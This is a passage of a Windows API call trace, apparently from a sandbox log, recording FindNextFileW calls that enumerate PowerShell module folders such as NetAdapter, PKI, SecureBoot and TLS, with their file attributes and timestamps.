ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.LocalAccounts", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="")) returned 1 [0332.086] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf898270e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf898270e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf898270e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8a8d76f, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8a8d76f, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="")) returned 1 [0332.087] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8ad9c23, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8ad9c23, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8ad9c23, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b4c2ac, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b72610, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b72610, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe77f21, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b9877d, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b9877d, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b9877d, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PersistentMemory", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0332.088] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcc02299f, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8cc9a10, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProcessMitigations", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x40134965, ftLastWriteTime.dwHighDateTime=0x1d61756, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Provisioning", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1f2a21, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b2652f0, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b2652f0, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="")) returned 1 [0332.089] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b2652f0, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageBusCache", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UEV", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="")) returned 1 [0332.090] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0332.091] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Whea", cAlternateFileName="")) returned 1 [0332.091] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, 